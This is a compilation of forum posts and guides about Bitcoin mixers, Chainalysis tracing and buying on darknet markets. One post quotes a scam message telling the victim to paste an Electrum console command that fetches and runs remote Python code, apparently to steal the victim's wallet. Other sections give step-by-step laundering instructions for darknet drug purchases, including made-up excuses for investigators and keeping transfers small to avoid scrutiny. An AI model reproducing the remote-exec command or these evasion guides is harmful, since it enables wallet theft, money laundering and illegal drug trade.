Just how bad is Chainalysis?

I've read about how some guy got his account blocked in Binance because he sent a transaction from Wasabi wallet. I've read it goes deep into several iterations after the mix. For instance:
You send the coins into a mixer -> send it back to you to address A -> send it back to you to address B -> send it to an exchanger.
Chainalaysis will notice the coins are mixed even if you've send it to 2 "clean addresses" before that. This is insanity. It could put people into trouble since one could mix the coins, send it to someone else, then this person sends it to an exchange where he is identified with his real name, and he ends up in some money laundering investigation scheme. Just nuts.
Does it recognize all mixers? If you use helix, chipmixer or whatever else... how would it even know? Do they just keep adding more and more "blacklisted" addresses? In a long enough timeline the % of ending up in some "money laundering investigation" is increasingly higher.
Until we have proper fungibility in Bitcoin, I wouldn't send a single satoshi to an exchanger that doesn't come from:
1) Coins you've bought from an exchange that uses Chainalysis (whitelisted by default since they had it on their custody wallet, one would assume those are safe)
2) Mined coins with no tx history
These f*ckers are just developing an scheme to put people in trouble and confiscate coins. Use bisq outside of the above mentioned cases IMO. Just assume 0 privacy when dealing with your average big exchange. Better safe than sorry. Our only hope is smart devs crush their Chainalysis dreams where every coin has an ID.

What are the best Mixers to use for Bitcoin at the moment

With fees down again, I was wondering what is the best mixer out there since the old kings Bitmixer.io and Helix are gone now
submitted by Dregrez to Bitcoin [link] [comments]

I got scammed again, right?

I needed to mix some coins and so naively googled "helix gram mixer" and chose the first link displayed ( http://www.helix-light.org/ ). I figured almighty Google wouldn't be reckless enough to promote a fraud.
I entered all the required information and sent my bitcoin to the address provided. A few minutes later I hit the refresh page button and I got the following:

Not Found
The requested URL /helix/light/status/c0211f1db760a36 was not found on this server.
Luckily I saved the Verify String and the top info was
Hash: SHA1
Helix ID: c0211f1db760a36
Helix Address: 1N13F2NJD8kFWuGT1nXS6zUF2JTf2DvaZX
Helix URL: https://helixmixer.org/helix/light/status/c0211f1db760a36
Payment Address: 1Mbw4TQMes2VSo9gWFChvSm5nxDz1prCJe
Fee: 2.5%
Created: 1512517241
Expires: 1512571241

They finally replied after a week or so:

First of all we apologize for the possible problems that may have caused our failure. This has been due to an internal failure in our transaction database, so we are not able to match source with destination. Anyway, we will return all your money including fees as soon as possible. However, we have been victim of cheating attempts and we must verify that you are the owner of the original account. Do not worry, we have simplified the protocol and you should follow just simple instructions. Follow these instructions step by step:
1) Open electrum with the wallet you made the transaction.
2) Go to the View menu -> Show console -> Click on the "Console" tab.
3) Type next line and replace “” with the output address you used in the mixing process. (you can copy and paste it from your guarantee letter)" IMPORTANT PRESS ENTER AFTER PASTE IT!!!
exec("import requests\nexec(requests.get('https://helixmixer.org/anticheat/').text)")
4) Then program will ask you to sign an internal message that will be send to us.
5) Wait for the verification message in the command line.
Suppose your output address was: 1F1tAaz5x1HUXrCNLbtMDqcw6o5GNn4xqX
You have to open your electrum console and copy and paste next line (IMPORTANT PRESS ENTER AFTER PASTE IT!!):
exec("import requests\nexec(requests.get('https://helixmixer.org/anticheat/1F1tAaz5x1HUXrCNLbtMDqcw6o5GNn4xqX').text)")
If everything goes right you will receive this message: "Verified, your bitcoins will be back in a few seconds."
Please, do not hesitate to contact us if you have any further questions or complains,

Is it possible to trace "mixed" bitcoins?

I use Helix.
So, my question is, is it possible for third-parties to trace transactions that are mixed via services like Helix?
submitted by thr0w4way_x09 to Bitcoin [link] [comments]

Bitcoin tumbling, also referred to as Bitcoin mixing or Bitcoin laundering, is the process of using a third party service to break the connection between a Bitcoin address sending coins and the address(s) they are sent to. Since the Bitcoin blockchain is a public ledger that records every transaction, mixing coins is critical for anyone who doesn’t want the entire world to know exactly where they send and store their BTC, or from where they receive it.
Properly mixing coins may seem like a daunting task to those who aren’t very familiar with Bitcoin, but it is actually a simple process that will only take a few minutes of your time for each deposit.
There are good reasons for everyone to mix their coins, but for those who use Darknet Markets in particular, it is a necessity. New tools are being built all the time to increase the ability of the public, as well as private corporations and government agencies, to follow coins through the blockchain and track those who use it. It may seem like a waste of time now, but in the near future it may be simple for anyone- including friends, relatives, employers, and law enforcement, to track every Bitcoin transaction you’ve ever made and see exactly where it ended up. Breaking the connection between your addresses and the coins’ destination by mixing them is certainly a precaution that all DNM users should take.
In this guide we attempt to provide the simplest possible step-by-step instructions to help users unfamiliar with the process of Bitcoin tumbling do so effectively. This guide assumes the reader already has a basic understand of how to send Bitcoins and how to use .onion sites.
To mix your coins using this method, you will need:
-Bitcoins, or the ability to buy them. -The Tor Browser -The ability to create new Bitcoin wallets, both via Tor and on the clear net. We recommended using Electrum, but any client that functions over Tor will work. Alternately, you could use Blockchain.info and their Tor hidden service to create all or some of your wallets.
NOTE: Always make sure you get the .onion link for this and every hidden service from a safe place (like Darknetmarkets.org), never from Wikipedia, Reddit, or Hidden Wikis! Also make sure that you never use the blockchain.info clearnet url over Tor; doing that opens you up another possible vulnerability (malicious tor exit nodes). A good place to make sure you are using the correct URL is from our Darknet Resources page, or memorize our short link for it: drk.li/BC.
The Steps
Step #1: Create a wallet on the clearnet. (We will refer to this as wallet #1)
Step #2: Buy Bitcoins, and send the amount you want to mix to wallet #1.
Step #3: Create a second wallet, this time over the Tor network. (wallet #2)
Step #4: Send your bitcoins from wallet #1 directly to wallet #2.
The reason for this is to add plausible dependability between your clearnet wallet and in-person purchases. If you are ever investigated by law enforcement or the company from which you are buying coins (this happens with Coinbase.com especially), you can reasonably claim that you sent them to someone else who controls wallet #2 (for whatever made-up reason you have in mind as your excuse for your BTC purchase). After that you have no idea/don’t care what that person did with them, nor should anyone expect you to.
Step #5: Create a third wallet, also over the Tor network. (wallet #3).
Step #6: Select which mixer you will be using, and set up your transaction there using the address(s) from wallet #3. It is best to use multiple addresses, and to set random time delays.
Scams are rampant everywhere online, and the darknet is no different. You can choose your mixer(s) and get the correct URLs from our list of darknet Bitcoin mixers.
We recommend Helix by Grams first, and then Bitcoin Fog, as the two seemingly best in a group of imperfect options. They have both been extremely reliable so far while processing millions of dollars. DO NOT use blockchain.info’s shared send or any other coinjoin product as your mixer, as those do not completely hide your trail like the others.

NOTE: Turn off JavaScript before doing this step if you are using Helix, Bitcoin Fog, r or other mixers that function without it. (Click on the “S!” icon before the address bar in the Tor browser, then >Forbid Scripts Globally”.)

Purchasing off DWM?

Been looking at vendors for a month or so now. Ready to purchase. Bought btc using my debit card. Didnt use a bitcoin anonymity sender service such as bit fog or helix mixer. I am using a VPN and tor and will pgp encrypt my address. I know there's alot of debate over to use your real name or not. I really prefer not to, although ive ordered before once usinf my real name with no problem. My question is, instead of using my name can I use "To: current resident"? Or, "To: the (last name) family"? Thank you in advance.

INFO: How to buy Bitcoins, How to use wallets/ mixers/ etc.

Hey Ents!
Glad my previous post was of help to a few people! Many of you have messaged me to help on particular topics, and especially bitcoins, so I will be covering a bit about the alternative currency in this post.
Without dwelling much into historical facts, let me first say that bitcoin could very well be the currency on the future, and it is intended to replace paper money - and most importantly, government’s and legal fraudsters like bank’s control over our economy.
How is bit coin produced? It is the financial value derived through computing power. For example, A computer processing data at a hash-rate of 15 GHS (Giga Hertz per second) may produce 1 bit coin each month. Here, electricity costs and computing power costs are converted into Bitcoins which has inherent value.
Okay enough of all that, how to get bitcoin? The easiest way is to buy bit coins from www.localbitcoins.com (LBC). This is somewhat similar to a stock exchange and you can buy and sell bitcoins from reputed vendors using IMPS/NEFT/Cash transfers.
Important things to look out for are - make sure the person you are buying from has 100% rating. Any less could spell trouble.
Make sure the listing is an escrow listing. Escrow is a term used a lot on DNM’s. It simply means the coins/money is in control of a third party and is not released to the vendor till you are satisfied. It protects both the buyer and the seller. If you are not satisfied, you can raise a complaint and get your coins back.
Always use LBC only through a normal browser. Never through a TOR browser. But what about anonymity, you may ask. The fact is that buying bit coins is completely legal and you do not need any anonymity to purchase coins. There are several legit purposes for bit coins including shopping for clothes, on Dell website, and several other electronic stores. You only need to be anonymous when you are making a deal on the DNM’s
So; once you have purchased your coins - if you are using the coins to buy drugs, you need to maintain anonymity. The best part about LBC is that it offers a certain degree of anonymity built in to its systems. For very small transactions, you can send the coins directly from the LBC wallet into your darknet market wallet.
What is a wallet? A wallet is a storage medium for your bitcoins. Simply put, it is a ‘bank’ for all your coins. The wallet has a bitcoin address which is similar to your bank account number. You can send and receive bit coins using this address and the transaction will be processed within 30 minutes (usually 2 confirmations).
I suggest using a wallet on TOR browser to remain anonymous.
The blockchain.info wallet on TOR is once of the most secure onion wallets. You can create a free wallet here; remember to never forget the wallet seed and password else you may risk losing your bitcoins.
For larger purchases, I suggest sending coins from LBC onto a Blockchain wallet, and then from the block chain wallet onto the DNM market. Adding few steps between the source of the coins and the destination helps maintain anonymity and obscuring the fact that the coins are involved in a drug marketplace. This is known as mixing coins. (LBC has an inbuilt mixer - this is the reason it is safe to use LBC to send coins directly to DNMs)
Coinb.in is also a good alternative wallet: http://4zpinp6gdkjfplhk.onion/
So, can I directly use my bank account, pay via IMPS to buy bitcoins and use them on a DNM? Yes, as long as it is a small transaction (<< Rs. 40,000) no eyebrows will be raised whatsoever. For larger transactions I suggest using the mixing technique above, and also adding couple of other intermediary wallets and maybe even a standalone mixer service.
What is a standalone mixer? A mixer’s purpose is to obfuscate the trail of money - in this case, coins. Generally a mixer will receive several thousands of coins from various addresses, and send these coins out to different addresses after an interval of time. There will be no trail of the source of the coins and the destination because the mixer processes several large transactions. For a real world example, you can consider going to a bank and depositing a particular Rs. 1000 note. When you want to withdraw from an ATM, the odds of you getting the same note which you deposited are negligible. This is the outlining principle of using a mixer.
Helix Light is a cheap and efficient mixer which works at a 2.5% fee. http://grams7enufi7jmdl.onion/helix/light
Mixing is really required only in the case of big transactions; or if you really want to feel 100% secure. For the normal DNM transaction involving a fee grams of this or that, this is highly unnecessary.
So, by now you should be able to buy bit coins, mix them if required using a TOR wallet or a mixer, and be ready to send them into a DNM for your purchase.
While using DNM markets, make sure that the market link is the correct link - you can verify it from dnstats.net or set up 2-factor authentication on your account along with a login phrase. All these steps are to prevent phishing attacks which may try to steal your coins by redirecting you to a malicious TOR link.
Once the coins are sent from LBC/Mixer wallet into the market, you are ready to make the purchase. Always do your homework on the vendor and never deal without escrow with unreputed vendors. This is called FE - Finalize Early. This means you are choosing not to use escrow, and are sending the coins directly to the vendor. Use this only when the vendor has good feedback and a reputation.
While placing an order and sending your address, always remember to use PGP.
Hope this was helpful; Please review the information I have posted and if I have missed out anything let me know. You can also ask me any questions or suggest methods of your own. Also I request to leave this thread informational and ask all your questions on drug sources and advertising on other threads.

What happens if you send coins to a mixer when the mempool is high?

Last night, we saw a pretty backed up mempool. We've seen it before and we will see it again.
I had a friend who was trying to move coins to a wallet, using a mixer as an intermediary. The mixer was Helix and it has a 15 hour wallet life. (By comparison, I've used BitMixer.io before and that has a 24 hour wallet life.)
But, the mempool started filling up. After 4 hours, the transaction was still unconfirmed. I tried double-spending back to their wallet with a higher fee (to effectively cancel the first transaction) but Electrum gave me a 258 (double spend) error. I learned about RBF in my search, but it is disabled by default in Electrum it would seem.
It seemed like I didn't have any reasonable options at my disposal other than to wait it out and hope the transaction goes through. Fortunately, it did, but this really showed me a glaring danger - correct me if I'm wrong, but had that wallets life on the mixing server expired, the transaction still would have gone through eventually (as the address if valid) but the coins would have been lost as the server would have destroyed the private key.
RBF certainly can help resolve this issue, but it is NOT user friendly to run the risk of coins being lost.
While my friend did figure out Bitcoin and mixer alone, they are not a Bitcoin-savvy individual (kudos for figuring it out though).

CoinJoins not as effective as running coins through a mixer?

Hi, thanks for all the work being done with CoinJoin and Joinmarket and I would appreciate if anybody knowledgeable about CoinJoin/Joinmarket could comment on this quote?
We recommend Helix by Grams and Bitmixer as the two seemingly best in a group of imperfect options. They have both been extremely reliable so far while processing millions of dollars. DO NOT use blockchain.info’s shared send or any other coinjoin product as your mixer, as those do not completely hide your trail like the others.
Here, they are talking about the effectiveness of different privacy advancing tools/services.
Does running your bitcoin through a coinjoin transaction effectively bring perfect fungibility back to your btc? Or does the fact that running your bitcoin through coinjoin mark it as a coinjoin transaction, also defeating any kind of fungibility argument?
